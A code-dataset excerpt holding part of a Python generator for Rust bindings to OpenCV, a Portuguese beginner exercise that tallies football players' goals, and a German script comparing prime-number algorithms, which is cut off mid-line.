atype.is_vector \\\n or atype.is_vector_of_vector or atype.is_ptr:\n call_args.append(\"%s.ptr\"%(a.rsname()))\n elif atype.is_string:\n call_args.append(\"CString::new(%s).unwrap().as_ptr()\"%(a.rsname()))\n else:\n call_args.append(\"%s\"%(a.rsname()))\n\n\n pub = \"\" if self.ci and self.ci.type_info().is_trait else \"pub \"\n rname = renamed_funcs.get(self.c_name()) or (\"new\" if self.isconstructor else self.overridename)\n\n io = StringIO()\n io.write(\" %sfn %s(%s) -> Result<%s,String> {\\n\"%(pub, rname, \", \".join(args), self.rv_type().rrvtype or self.rv_type().rtype))\n io.write(\" unsafe {\\n\")\n io.write(\" let rv = ::%s(%s);\\n\"%(self.c_name(), \", \".join(call_args)))\n io.write(\" if rv.error_msg as i32 != 0i32 {\\n\")\n io.write(\" let v = CStr::from_ptr(rv.error_msg).to_bytes().to_vec();\\n\");\n io.write(\" ::libc::free(rv.error_msg as *mut c_void);\\n\")\n io.write(\" return Err(String::from_utf8(v).unwrap())\\n\")\n io.write(\" }\\n\");\n if self.type == \"void\":\n io.write(\" Ok(())\\n\");\n elif self.rv_type().is_string:\n io.write(\" let v = CStr::from_ptr(rv.result).to_bytes().to_vec();\\n\");\n io.write(\" ::libc::free(rv.result as *mut c_void);\\n\");\n io.write(\" Ok(String::from_utf8(v).unwrap())\\n\");\n elif self.rv_type().is_boxed:\n io.write(\" Ok(%s{ ptr: rv.result })\\n\"%(self.rv_type().rtype))\n elif self.type == \"bool\":\n io.write(\" Ok(rv.result!=0)\\n\")\n else:\n io.write(\" Ok(rv.result)\\n\")\n io.write(\" }\\n\");\n io.write(\" }\\n\")\n\n return io.getvalue()\n\n def __repr__(self):\n return Template(\"FUNC <$type $namespace.$classpath.$name $args>\").substitute(**self.__dict__)\n\nclass ClassPropInfo():\n def __init__(self, decl): # [f_ctype, f_name, '', '/RW']\n self.ctype = decl[0]\n self.name = decl[1]\n self.rw = \"/RW\" in decl[3]\n\n def __repr__(self):\n return Template(\"PROP $ctype $name\").substitute(ctype=self.ctype, name=self.name)\n\nclass ClassInfo(GeneralInfo):\n def __init__(self, gen, decl, namespaces=[]): # [ 'class/struct cname', ': base', [modlist] ]\n GeneralInfo.__init__(self, gen, decl[0], namespaces)\n self.methods = []\n self.simple = False\n self.nested = False\n for m in decl[2]:\n if m == \"/Simple\" or m == \"/Map\" :\n self.simple = True\n if len(decl[0].split(\".\")) > 2:\n self.nested = True\n self.nested_cppname = \"::\".join(decl[0].split(\".\")[1:])\n self.nested_cname = \"_\".join(decl[0].split(\".\")[1:])\n self.base = decl[1].split(\" \")[1].split(\"::\")[1] if len(decl)>1 and len(decl[1])>1 else \"\"\n\n # class props\n self.props= []\n for p in decl[3]:\n self.props.append( ClassPropInfo(p) )\n\n # register\n if not gen.is_ignored(self.nested_cppname):\n gen.classes[self.name] = self\n\n def __repr__(self):\n# return Template(\"CLASS $namespace.$classpath.$name : $base\").substitute(**self.__dict__)\n return Template(\"CLASS $namespace.$classpath.$name simple:$simple\").substitute(**self.__dict__)\n\n def add_method(self, fi):\n self.methods.append(fi)\n\n def getAllMethods(self):\n result = []\n result.extend([fi for fi in sorted(self.methods) if fi.isconstructor])\n result.extend([fi for fi in sorted(self.methods) if not fi.isconstructor])\n return result\n\n def has_constructor(self):\n for fi in self.methods:\n if fi.isconstructor:\n return True\n return False\n\n def type_info(self):\n return self.gen.get_type_info(self.nested_cppname)\n\nclass ConstInfo(GeneralInfo):\n def __init__(self, gen, decl, addedManually=False, namespaces=[]):\n GeneralInfo.__init__(self, gen, decl[0], namespaces)\n self.fullname = decl[0].split(\" \")[1]\n if len(self.fullname.split(\".\")) > 1:\n self.rustname = \"_\".join(self.fullname.split(\".\")[1:])\n else:\n self.rustname = self.fullname\n self.cname = self.name.replace(\".\", \"::\")\n self.value = decl[1]\n self.addedManually = addedManually\n\n # register\n if self.isIgnored():\n logging.info('ignored: %s', self)\n elif not gen.get_const(self.name):\n gen.consts.append(self)\n\n def __repr__(self):\n return Template(\"CONST $name=$value$manual\").substitute(name=self.name,\n value=self.value,\n manual=\"(manual)\" if self.addedManually else \"\")\n\n def isIgnored(self):\n for c in const_ignore_list:\n if re.match(c, self.name):\n return True\n return False\n\n def gen_rust(self):\n if self.value.startswith('\"'):\n return \"pub const %s:&'static str = %s;\\n\"%(self.rustname, self.value)\n elif re.match(\"^(-?[0-9]+|0x[0-9A-F]+)$\", self.value):\n return \"pub const %s:i32 = %s;\\n\"%(self.rustname, self.value)\n return None\n\n def gen_cpp_for_complex(self):\n # only use C-constant dumping for unnested const\n if len(self.fullname.split(\".\")) > 2:\n return \"\"\n else:\n return \"\"\" printf(\"pub const %s:i32 = 0x%%x;\\\\n\", %s);\\n\"\"\"%(self.rustname, self.name)\n\nclass TypeInfo():\n def __init__(self, gen, typeid):\n self.gen = gen\n self.typeid = typeid\n\n self.is_string = typeid == \"string\"\n self.is_primitive = typeid in primitives\n self.is_ptr = typeid.startswith(\"Ptr::\")\n self.is_vector_of_vector = typeid.startswith(\"vector::vector::\")\n self.is_vector = typeid.startswith(\"vector::\")\n self.is_ignored = typeid.split(\"::\")[-1] in class_ignore_list\n\n self.class_info = None\n if typeid in self.gen.classes:\n self.class_info = self.gen.classes[typeid]\n self.is_simple = self.class_info and self.class_info.simple\n self.is_value = self.is_simple\n for k in value_struct_types:\n if k[1] == typeid:\n self.is_value = True\n self.is_boxed = not (self.is_value or self.is_simple\n or self.is_primitive or self.is_string)\n self.is_trait = self.class_info and not(self.is_value) and not(self.is_simple) and not self.class_info.has_constructor()\n\n typeid_underscore = typeid.replace(\"::\",\"_\")\n if self.is_value or self.is_simple:\n self.cpptype = typeid\n self.ctype = \"cv_struct_\" + typeid_underscore\n self.rtype = self.rctype = self.rrvtype = typeid_underscore\n elif self.is_primitive:\n self.cpptype = typeid\n self.ctype = primitives[typeid][\"ctype\"]\n self.rtype = self.rctype = self.rrvtype = primitives[typeid][\"rtype\"]\n elif self.is_vector_of_vector:\n self.ctype = \"void*\"\n self.rctype = \"*mut c_void\"\n self.cppelemtype = \"vector<%s>\"%(typeid.split(\"::\")[-1])\n self.cpptype = \"vector< %s >\"%(self.cppelemtype)\n self.relemtype = \"VectorOf%s\"%(typeid.split(\"::\")[2])\n self.rtype = self.rrvtype = \"VectorOf%s\"%(self.relemtype)\n self.gen_template_wrapper_rust_struct()\n elif self.is_vector:\n self.ctype = \"void*\"\n self.cppelemtype = typeid.split(\"::\")[-1]\n self.cpptype = \"vector<%s>\"%(self.cppelemtype)\n self.rctype = \"*mut c_void\"\n self.relemtype = typeid.split(\"::\")[1]\n self.rtype = self.rrvtype = \"VectorOf%s\"%(self.relemtype)\n if self.relemtype == \"string\":\n self.relemtype = \"String\"\n elif self.relemtype[0].islower():\n self.relemtype = \"c_%s\"%(self.relemtype)\n elif self.relemtype in ('KeyPoint', 'DMatch'):\n self.relemtype = \"features2d::%s\"%(self.relemtype)\n else:\n self.relemtype = \"core::%s\"%(self.relemtype)\n self.gen_template_wrapper_rust_struct()\n elif self.is_ptr:\n self.ctype = \"void*\"\n self.rctype = \"*mut c_void\"\n self.cpptype = \"Ptr<%s>\"%(typeid.split(\"::\")[-1])\n self.rtype = self.rrvtype = \"PtrOf%s\"%(typeid.split(\"::\")[1])\n self.gen_template_wrapper_rust_struct()\n elif self.is_string:\n self.ctype = \"const char*\"\n self.cpptype = \"string\"\n self.rtype = self.rctype = \"*const ::libc::c_char\"\n self.rrvtype = \"String\"\n else:\n self.ctype = \"void*\"\n self.cpptype = self.rtype = self.rrvtype = typeid\n self.rctype = \"*mut c_void\"\n\n def __repr__(self):\n r = [ ]\n if self.is_string: r.append(\"(string)\")\n if self.is_primitive: r.append(\"(prim)\")\n if self.is_simple: r.append(\"(simple)\")\n if self.is_value: r.append(\"(value)\")\n if self.is_vector: r.append(\"(vector)\")\n if self.is_vector_of_vector: r.append(\"(vector_of_vector)\")\n if self.is_ptr: r.append(\"(ptr)\")\n if self.is_trait: r.append(\"(trait)\")\n return self.typeid + \" \" + \"\".join(r)\n\n\n def gen_template_wrapper_rust_struct(self):\n with open(self.gen.output_path+\"/\"+self.rtype+\".type.rs\", \"w\") as f:\n f.write(\"#[allow(dead_code)] pub struct %s { pub ptr: *mut c_void }\\n\"%(self.rtype));\n if self.rtype.startswith(\"VectorOf\"):\n if self.rtype.startswith(\"VectorOfstring\"):\n rrawelemtype = \"*mut c_char\"\n rconv = \"CStr::from_ptr(elem).to_string_lossy().into_owned()\"\n else:\n rrawelemtype = self.relemtype\n rconv = \"elem\"\n f.write(Template(\"\"\"\n extern \"C\" {\n fn cv_new_$rtype() -> *mut c_void;\n fn cv_delete_$rtype(ptr:*mut c_void) -> ();\n fn cv_${rtype}_len(ptr:*mut c_void) -> i32;\n fn cv_${rtype}_at(ptr:*mut c_void, index: c_int, elem:*mut $rrawelemtype);\n }\n impl $rtype {\n pub fn new() -> $rtype {\n unsafe { return $rtype { ptr:cv_new_$rtype() } };\n }\n pub fn into_vec(self: $rtype) -> Vec<$relemtype> {\n unsafe {\n let mut result = Vec::with_capacity(cv_${rtype}_len(self.ptr) as usize);\n for index in 0..result.capacity() {\n let mut elem: $rrawelemtype = uninitialized();\n cv_${rtype}_at(self.ptr, index as i32, &mut elem);\n result.push($rconv);\n }\n return result\n }\n }\n }\n impl Drop for $rtype {\n fn drop(&mut self) {\n unsafe { cv_delete_$rtype(self.ptr) };\n }\n }\\n\"\"\").substitute(rtype=self.rtype, relemtype=self.relemtype,\n rrawelemtype=rrawelemtype, rconv=rconv))\n if self.rtype.startswith(\"VectorOf\"):\n with open(self.gen.output_path+\"/\"+self.rtype+\".type.cpp\", \"w\") as f:\n if self.rtype.startswith(\"VectorOfstring\"):\n cppelemtype = \"const char*\"\n cppconv = \".c_str()\"\n else:\n cppelemtype = self.cppelemtype\n cppconv = \"\"\n f.write(Template(\"\"\"\n #include \"opencv2/opencv_modules.hpp\"\n #include \"opencv2/$module/$module.hpp\"\n using namespace cv;\n extern \"C\" {\n void* cv_new_$rtype() { return new std::$cpptype(); }\n void cv_delete_$rtype(void* ptr) { delete (($cpptype*) ptr); }\n int cv_${rtype}_len(void* ptr) { return (($cpptype*) ptr)->size(); }\n void cv_${rtype}_at(void* ptr, int index, $cppelemtype* elem) {\n *elem = (*(($cpptype*) ptr))[index]$cppconv;\n }\n }\\n\"\"\").substitute(\n rtype=self.rtype, cpptype=self.cpptype, cppelemtype=cppelemtype,\n cppconv=cppconv, module=self.gen.module))\n\n#\n# GENERATOR\n#\n\nclass RustWrapperGenerator(object):\n def __init__(self):\n self.clear()\n\n def clear(self):\n self.module = \"\"\n self.Module = \"\"\n self.classes = { }\n self.functions = [];\n self.ported_func_list = []\n self.skipped_func_list = []\n self.consts = []\n self.type_infos = {}\n\n def get_class(self, classname):\n return self.classes[classname]\n\n def get_type_info(self, typeid):\n if not typeid in self.type_infos:\n self.type_infos[typeid] = TypeInfo(self, typeid)\n return self.type_infos[typeid]\n\n def get_const(self, name):\n for c in self.consts:\n if c.cname == name:\n return c\n return None\n\n def add_decl(self, decl):\n name = decl[0]\n if name.startswith(\"struct\") or name.startswith(\"class\"):\n ClassInfo(self, decl, namespaces=self.namespaces)\n elif name.startswith(\"const\"):\n ConstInfo(self, decl, namespaces=self.namespaces)\n else:\n FuncInfo(self, decl, namespaces=self.namespaces)\n\n def gen(self, srcfiles, module, output_path):\n parser = hdr_parser.CppHeaderParser()\n self.output_path = output_path\n self.module = module\n self.Module = module.capitalize()\n includes = [];\n\n for hdr in srcfiles:\n decls = parser.parse(hdr)\n self.namespaces = parser.namespaces\n logging.info(\"\\n\\n===== Header: %s =====\", hdr)\n logging.info(\"Namespaces: %s\", parser.namespaces)\n if decls:\n includes.append('#include \"' + hdr + '\"')\n for decl in decls:\n logging.info(\"\\n--- Incoming ---\\n%s\", pformat(decl, 4))\n self.add_decl(decl)\n\n if module in ManualFuncs:\n for decl in ManualFuncs[self.module]:\n logging.info(\"\\n--- Manual ---\\n%s\", pformat(decl, 4))\n self.add_decl(decl)\n\n logging.info(\"\\n\\n===== Generating... =====\")\n self.moduleCppTypes = StringIO()\n self.moduleCppCode = StringIO()\n self.moduleCppConsts = StringIO()\n self.moduleRustCode = StringIO()\n self.moduleRustExterns = StringIO()\n\n for co in self.consts:\n rust = co.gen_rust()\n if rust:\n self.moduleRustCode.write(rust)\n else:\n self.moduleCppConsts.write(co.gen_cpp_for_complex())\n\n if self.moduleCppConsts.getvalue != \"\":\n self.moduleRustCode.write(\n \"\"\"include!(concat!(env!(\"OUT_DIR\"), \"/%s.consts.rs\"));\\n\"\"\"%(self.module)\n )\n\n for ci in self.classes.values():\n if ci.nested:\n self.gen_nested_class_decl(ci)\n\n for c in value_struct_types:\n if c[0] == module:\n self.gen_value_struct(c)\n\n for c in self.classes.values():\n if c.simple:\n self.gen_simple_class(c)\n\n for fi in self.functions:\n self.gen_func(fi)\n\n if module in forced_boxed_classes:\n for cb in forced_boxed_classes[module]:\n self.gen_boxed_class(cb)\n\n for ci in self.classes.values():\n self.gen_class(ci)\n\n with open(output_path+\"/types.h\", \"a\") as f:\n f.write(self.moduleCppTypes.getvalue())\n\n with open(output_path+\"/\" + self.module + \".consts.cpp\", \"w\") as f:\n f.write(\"\"\"#include \\n\"\"\")\n f.write(\"\"\"#include \"opencv2/opencv_modules.hpp\"\\n\"\"\")\n f.write(\"\"\"#include \"opencv2/%s/%s.hpp\"\\n\"\"\"%(module,module))\n f.write(\"\"\"using namespace cv;\\n\"\"\")\n f.write(\"int main(int argc, char**argv) {\\n\");\n f.write(self.moduleCppConsts.getvalue())\n f.write(\"}\\n\");\n\n with open(output_path+\"/\"+module+\".cpp\", \"w\") as f:\n f.write(Template(T_CPP_MODULE).substitute(m = module, M = module.upper(), code = self.moduleCppCode.getvalue(), includes = \"\\n\".join(includes)))\n\n with open(output_path+\"/%s.externs.rs\"%(module), \"w\") as f:\n f.write(\"extern \\\"C\\\" {\\n\")\n f.write(self.moduleRustExterns.getvalue())\n f.write(\"}\\n\")\n\n with open(output_path+\"/\"+module+\".rs\", \"w\") as f:\n f.write(Template(T_RUST_MODULE).substitute(m = module, M = module.upper(), code = self.moduleRustCode.getvalue(), module_import = (\"use ::sys::core::*;\\n\" if not module == \"core\" else \"\")))\n\n with open(output_path+\"/\"+module+\".txt\", \"w\") as f:\n f.write(self.makeReport())\n\n def makeReport(self):\n '''\n Returns string with generator report\n '''\n report = StringIO()\n total_count = len(self.ported_func_list)+ len(self.skipped_func_list)\n report.write(\"PORTED FUNCs LIST (%i of %i):\\n\\n\" % (len(self.ported_func_list), total_count))\n report.write(\"\\n\".join(self.ported_func_list))\n report.write(\"\\n\\nSKIPPED FUNCs LIST (%i of %i):\\n\\n\" % (len(self.skipped_func_list), total_count))\n report.write(\"\".join(self.skipped_func_list))\n return report.getvalue()\n\n def is_ignored(self, type_name):\n return type_name.split(\"::\")[-1] in class_ignore_list\n\n\n def gen_vector_struct_for(self, name):\n struct_name = \"cv_vector_of_\"+name\n self.defined_in_types_h.appand(struct_name)\n self.moduleCppTypes.write\n\n def gen_func(self, fi):\n reason = fi.reason_to_skip()\n if reason:\n self.skipped_func_list.append(\"%s\\n %s\\n\"%(fi,reason))\n return\n self.ported_func_list.append(fi.__repr__())\n\n rv_header_type = fi.rv_header_type()\n rv_info = self.get_type_info(rv_header_type)\n\n self.moduleCppCode.write(fi.gen_cpp_prelude())\n\n decl_c_args = \"\\n \"\n call_cpp_args = \"\"\n if not fi.ci == None and not fi.isconstructor:\n decl_c_args += self.get_type_info(fi.ci.name).ctype + \" instance\"\n for a in fi.args:\n atype = a.type_info()\n if not decl_c_args.strip() == \"\":\n decl_c_args+=\",\\n \"\n if not call_cpp_args == \"\":\n call_cpp_args += \", \"\n\n rw = a.out == \"O\" or a.out == \"IO\"\n\n\n arg_decl_star = not atype.is_boxed and rw\n if atype.is_string:\n decl_c_args += \"const char *\" + a.name\n elif arg_decl_star:\n decl_c_args += atype.ctype + \" *\" + a.name\n else:\n decl_c_args += atype.ctype + \" \" + a.name\n\n if atype.is_boxed or atype.is_vector \\\n or atype.is_vector_of_vector or atype.is_ptr:\n call_cpp_args += \"*((%s*)%s)\"%(atype.cpptype, a.name)\n elif atype.is_string:\n call_cpp_args += a.name\n elif atype.is_value or atype.is_simple:\n if arg_decl_star and a.pointer:\n call_cpp_args += \"reinterpret_cast<\" + atype.cpptype + \"*>(\" + a.name + \")\"\n elif arg_decl_star and not a.pointer:\n call_cpp_args += \"*reinterpret_cast<\" + atype.cpptype + \"*>(\" + a.name + \")\"\n elif a.pointer:\n call_cpp_args += \"reinterpret_cast<\" + atype.cpptype + \"*>(&\" + a.name + \")\"\n else:\n call_cpp_args += \"*reinterpret_cast<\" + atype.cpptype + \"*>(&\" + a.name + \")\"\n else:\n if arg_decl_star and a.pointer:\n call_cpp_args += a.name\n elif not arg_decl_star and not a.pointer:\n call_cpp_args += a.name\n else:\n call_cpp_args += \"*\" + a.name\n\n\n # C function prototype\n self.moduleCppCode.write(\"struct cv_return_value_%s %s(%s) {\\n\"%(rv_info.ctype.replace(\" \",\"_\").replace(\":\",\"_\").replace(\" \",\"_\").replace(\"*\", \"_\"), fi.c_name(), decl_c_args));\n\n self.moduleCppCode.write(\" try {\\n\");\n # cpp method call with prefix\n if fi.ci == None:\n call_name = \"cv::\" + fi.cppname\n elif fi.isconstructor and fi.ci.type_info().is_boxed:\n call_name = fi.ci.nested_cppname\n elif fi.cppname == \"()\":\n call_name = \"(*((%s*) instance))\"%(self.get_type_info(fi.ci.name).cpptype)\n else:\n call_name = \"((%s*) instance)->%s\"%(self.get_type_info(fi.ci.name).cpptype, fi.cppname)\n\n # actual call\n if fi.type == \"void\":\n self.moduleCppCode.write(\" %s(%s);\\n\"%(call_name, call_cpp_args))\n elif fi.isconstructor and rv_info.is_boxed:\n self.moduleCppCode.write(\" %s* cpp_return_value = new %s(%s);\\n\"%(rv_info.cpptype, call_name,\n call_cpp_args));\n elif fi.isconstructor and call_cpp_args != \"\":\n self.moduleCppCode.write(\" %s cpp_return_value(%s);\\n\"%(rv_info.cpptype, call_cpp_args));\n elif fi.isconstructor:\n self.moduleCppCode.write(\" %s cpp_return_value;\\n\"%(rv_info.cpptype));\n else:\n self.moduleCppCode.write(\" %s cpp_return_value = %s(%s);\\n\"%(rv_info.cpptype, call_name,\n call_cpp_args));\n\n self.gen_c_return_value_type(rv_info);\n\n # return value\n if fi.type == \"void\":\n self.moduleCppCode.write(\" return { NULL, 0 };\\n\");\n elif rv_info.is_string:\n self.moduleCppCode.write(\" return { NULL, strdup(cpp_return_value.c_str()) };\");\n elif rv_info.is_boxed and not fi.isconstructor:\n self.moduleCppCode.write(\" return { NULL, new %s(cpp_return_value) };\\n\"%(rv_info.cpptype));\n elif rv_info.is_boxed and fi.isconstructor:\n self.moduleCppCode.write(\" return { NULL, cpp_return_value };\\n\")\n elif rv_info.is_value:\n self.moduleCppCode.write(\" return { NULL, *reinterpret_cast(&cpp_return_value) };\\n\"%(rv_header_type.replace(\"::\", \"_\")))\n elif rv_info.is_vector:\n self.moduleCppCode.write(\" return { NULL, (void*) new %s(cpp_return_value) };\\n\"%(rv.info.cpptype));\n else:\n self.moduleCppCode.write(\" return { NULL, cpp_return_value };\\n\");\n\n self.moduleCppCode.write(\"} catch (cv::Exception& e) {\\n\");\n self.moduleCppCode.write(\" char* msg = strdup(e.what());\\n\");\n self.moduleCppCode.write(\" return { msg, 0 };\\n\");\n self.moduleCppCode.write(\"} catch (...) {\\n\");\n self.moduleCppCode.write(\" char* msg = strdup(\\\"unspecified error in OpenCV guts\\\");\\n\");\n self.moduleCppCode.write(\" return { msg, 0 };\\n\");\n self.moduleCppCode.write(\"}\\n\");\n\n self.moduleCppCode.write(\"}\\n\\n\");\n\n # rust's extern C\n self.moduleRustExterns.write(fi.gen_rust_extern())\n\n # rust safe wrapper\n self.moduleRustCode.write(fi.gen_rustdoc_default_args())\n self.moduleRustCode.write(fi.gen_rust_wrapper())\n\n def gen_value_struct_field(self, name, typ):\n rsname = name\n if rsname in [\"box\", \"type\"]:\n rsname = \"_\" + rsname\n if \"[\" in typ:\n bracket = typ.index(\"[\")\n cppt = typ[:bracket]\n ct = self.get_type_info(cppt).ctype\n size = typ[bracket+1:-1]\n rst = self.get_type_info(cppt).rtype\n self.moduleCppTypes.write(\" %s %s[%s];\\n\"%(ct, name, size))\n self.moduleRustCode.write(\" pub %s: [%s;%s],\\n\"%(rsname, rst, size))\n else:\n cppt = typ\n ct = self.get_type_info(cppt).ctype\n rst = self.get_type_info(cppt).rtype\n self.moduleCppTypes.write(\" %s %s;\\n\"%(ct, name))\n self.moduleRustCode.write(\" pub %s: %s,\\n\"%(rsname, rst))\n\n def gen_value_struct(self, c):\n self.moduleCppTypes.write(\"typedef struct cv_struct_%s {\\n\"%(c[1]))\n self.moduleRustCode.write(\"#[repr(C)]#[derive(Debug,PartialEq)] pub struct %s {\\n\"%(c[1]))\n for field in value_struct_types[c]:\n self.gen_value_struct_field(field[0], field[1])\n self.moduleCppTypes.write(\"} cv_struct_%s;\\n\\n\"%(c[1]))\n self.moduleRustCode.write(\"}\\n\")\n\n def gen_simple_class(self,ci):\n self.moduleCppTypes.write(\"typedef struct cv_struct_%s {\\n\"%(ci.nested_cname))\n self.moduleRustCode.write(\"#[repr(C)]#[derive(Debug,PartialEq)] pub struct %s {\\n\"%(ci.nested_cname))\n for p in ci.props:\n self.gen_value_struct_field(p.name, p.ctype)\n self.moduleRustCode.write(\"}\\n\")\n self.moduleCppTypes.write(\"} cv_struct_%s;\\n\\n\"%(ci.nested_cname))\n\n def gen_c_return_value_type(self, typ):\n with open(self.output_path+\"/cv_return_value_\"+typ.ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\")+\".type.h\", \"w\") as f:\n f.write(Template(\"\"\"struct cv_return_value_$sane {\n char* error_msg;\n $ctype result;\n };\\n\"\"\").substitute(\n sane=typ.ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\"),\n ctype=\"int\" if typ.ctype == \"void\" else typ.ctype\n ))\n with open(self.output_path+\"/cv_return_value_\"+typ.ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\")+\".rv.rs\", \"w\") as f:\n f.write(Template(\"\"\"#[repr(C)] pub struct cv_return_value_$sane {\n pub error_msg: *const ::libc::types::os::arch::c95::c_char,\n pub result: $rtype\n }\\n\"\"\").substitute(\n sane=typ.ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\"),\n rtype=typ.rctype or typ.rtype\n ))\n\n def gen_boxed_class(self, name):\n cname = name\n cppname = name\n if name in self.classes:\n cname = self.classes[name].nested_cname\n cppname = self.classes[name].nested_cppname\n self.moduleRustExterns.write(\"pub fn cv_%s_delete_%s(ptr : *mut c_void);\\n\"%(self.module,cname));\n\n self.moduleRustCode.write(Template(\"\"\"\n #[allow(dead_code)]\n pub struct $cname {\n pub ptr: *mut c_void\n }\n impl Drop for $cname {\n fn drop(&mut self) {\n unsafe { ::cv_${module}_delete_${cname}(self.ptr) };\n }\n }\n impl $cname {\n fn as_ptr(&self) -> *mut c_void { self.ptr }\n }\n \"\"\").substitute(cname=cname, module=self.module))\n ci = self.get_class(name)\n if ci.base:\n self.moduleRustCode.write(Template(\"\"\"\n impl $base for $cname {\n fn as_ptr(&self) -> *mut c_void { self.ptr }\n }\n \"\"\").substitute(cname=cname, base=ci.base))\n self.moduleCppCode.write(\"void cv_%s_delete_%s(void* instance) {\\n\"%(self.module, cname));\n self.moduleCppCode.write(\" delete (cv::%s*) instance;\\n\"%(cppname));\n self.moduleCppCode.write(\"}\\n\");\n\n def gen_nested_class_decl(self, ci):\n pass\n #self.moduleCppCode.write(\"class %s;\\n\"%(ci.nested_cname));\n\n def gen_class(self, ci):\n t = self.get_type_info(ci.nested_cppname)\n if t.is_trait:\n self.moduleRustCode.write(\"pub trait %s {\\n\"%(ci.name))\n self.moduleRustCode.write(\" fn as_ptr(&self) -> *mut c_void;\\n\")\n for fi in ci.getAllMethods():\n self.gen_func(fi)\n self.moduleRustCode.write(\"} // trait %s\\n\"%(ci.name))\n else:\n if t.is_boxed:\n self.gen_boxed_class(ci.nested_cppname)\n self.moduleRustCode.write(\"impl %s {\\n\"%(ci.name))\n for fi in ci.getAllMethods():\n self.gen_func(fi)\n self.moduleRustCode.write(\"}\\n\");\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage:\\n\", \\\n os.path.basename(sys.argv[0]), \\\n \" [...]\")\n print(\"Current args are: \", \", \".join([\"'\"+a+\"'\" for a in sys.argv]))\n exit(0)\n\n hdr_parser_path = os.path.abspath(sys.argv[1])\n if hdr_parser_path.endswith(\".py\"):\n hdr_parser_path = os.path.dirname(hdr_parser_path)\n sys.path.append(hdr_parser_path)\n import hdr_parser\n dstdir = sys.argv[2]\n module = sys.argv[3]\n srcfiles = sys.argv[4:]\n logging.basicConfig(filename='%s/%s.log' % (dstdir, module), format=None, filemode='w', level=logging.INFO)\n handler = logging.StreamHandler()\n handler.setLevel(logging.WARNING)\n logging.getLogger().addHandler(handler)\n print(\"Generating module '\" + module + \"' from headers:\\n\\t\" + \"\\n\\t\".join(srcfiles))\n generator = RustWrapperGenerator()\n generator.gen(srcfiles, module, dstdir)\n","sub_path":"gen_rust.py","file_name":"gen_rust.py","file_ext":"py","file_size_in_byte":43451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102244484","text":"lista = []\nplayer = {}\ngol = []\ntotal_gols = opc = index = 0\n\n# lista.append(dict.copy()) = se num fazer assim da bosta porque ele atribui uma lista a outra\n#ADICIONANDO ITEM NO DICIONÁRIO\nwhile True:\n #player.clear()\n player['cod'] = index\n player['nome'] = input(\"Digite o nome do jogador: \")\n quant = int(input(f\"Quantas partidas {player['nome']} jogou: \"))\n cont = 1\n while True:\n gol.append(int(input(f\"Quantos gols {player['nome']} fez na {cont}° partida \")))\n cont += 1\n\n if cont == quant + 1:\n player['gols'] = gol.copy()\n #CALCULANDO A QUANTIDADE DE GOLS\n for p in gol:\n total_gols = total_gols + p\n player['Total'] = total_gols\n gol.clear()\n lista.append(player.copy())\n break\n while True:\n opc = input(\"deseja continuar: [S/N] \").upper()[0]\n if opc in \"SN\":\n break\n print(\"ERRO! DIGITE 'N' OU 'S'\")\n if opc == \"N\":\n break\n else:\n index += 1\n#leitura bonitinha\nprint(\"-=\"*30)\nfor y in player.keys():\n print(f'{y:<13} ', end='')\nprint()\nfor k, v in enumerate(lista):\n print(f'{k:>3}', end='')\n for d in v.values():\n print(f'{str(d):<15}', end=\"\")\n print()\nprint(\"-=\"*30)\nwhile True:\n busca = int(input(\"Mostrar dados de qual jogador? (Digite 999 para parar)\"))\n if busca == 999:\n break\n if busca >= len(lista):\n print(f\"ERRO! não existe jogador com codigo{busca}\")\n else:\n #Pegando itens do dicionario\n print(f\"-- LEVANTAMENTO DO JOGADOR {lista[busca]['nome']}\")\n for i, g in enumerate(lista[busca]['gols']):\n print(f\" No jogo {i+1} fez {g} gols. \")\n print('-' *40)\nprint(\"< number: # we can also stop checking here!\n break # such divisors cannot occur in factorization\n if number % divisor == 0:\n isprime = False\n break # we can stop checking here!\n if isprime:\n result.append(number)\n return result\n\ndef turboNoTime(LIMIT):\n '''super turbo version'''\n result = []\n for number in range(2, LIMIT):\n isprime = True\n for divisor in result: # we only have to check for prime numbers!\n if divisor ** 2 > number: # we can also stop checking here!\n break # such divisors cannot occur in factorization\n if number % divisor == 0:\n isprime = False\n break # we can stop checking here!\n if isprime:\n result.append(number)\n return result\n\ndef turboRange(bekannte_prims,start,limit,num):\n '''super turbo version'''\n result = []\n for number in range(start, limit):\n isprime = True\n for divisor in bekannte_prims: # we only have to check for prime numbers!\n if divisor ** 2 > number: # we can also stop checking here!\n break # such divisors cannot occur in factorization\n if number % divisor == 0:\n isprime = False\n break # we can stop checking here!\n if isprime:\n bekannte_prims.append(number)\n result.append(number)\n return_vals[num] = result\n return result\n\n\n\n@timed\ndef turboPrallel(limit):\n needed_prims = int(math.ceil(math.sqrt(limit)))\n bekannte_prims = turboNoTime(needed_prims)\n start = len(bekannte_prims)\n\n\n process_count = 10\n missing_prim_count = start\n prims_per_process = int(math.floor((limit - missing_prim_count) / process_count))\n\n\n\n processes=[]\n for i in range(0,process_count):\n if i == process_count-1:\n processes.append(Process(target=turboRange,args = (bekannte_prims, start,int(limit),i)))\n break\n processes.append(Process(target=turboRange,args = (bekannte_prims, start,start+prims_per_process,i)))\n start+=prims_per_process\n\n\n\n for i in range(0,process_count):\n processes[i].start()\n\n for i in range(0,process_count):\n processes[i].join()\n bekannte_prims.extend(return_vals[i])\n return bekannte_prims\n\n\n@timed\ndef sumMethod(n):\n prim = [2,3]\n primSum = [0,0];\n check = 5\n while check teilbar durch\"+str(prim[primIndex])+\"\\n\")\n break\n elif primSum[primIndex] > check:\n #print(\"->nicht teilbar durch\"+str(prim[primIndex]))\n primIndex+=1\n continue\n else:\n while primSum[primIndex]< check:\n primSum[primIndex] += prim[primIndex]\n #print(\"PrimSum:\"+str(primSum[primIndex]))\n if primSum[primIndex] == check:\n break\n if primSum[primIndex] > check:\n #print(\"->nicht teilbar durch\"+str(prim[primIndex]))\n primIndex+=1\n break\n else:\n prim.append(check);\n #print(\"=>Primzahl\"+\"\\n\")\n primSum.append(check)\n check+=1\n return prim\n\n\nmanager = Manager()\nreturn_vals = manager.dict()\n\n\nlimit = input(\"Obere Schranke fuer Primzahlenberechnung 